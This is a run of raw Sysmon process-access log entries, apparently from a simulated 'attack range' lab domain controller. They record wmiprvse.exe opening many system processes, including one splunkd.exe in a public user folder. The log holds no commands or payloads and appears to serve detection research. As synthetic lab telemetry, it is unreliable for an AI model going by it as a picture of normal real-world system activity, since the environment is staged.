13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 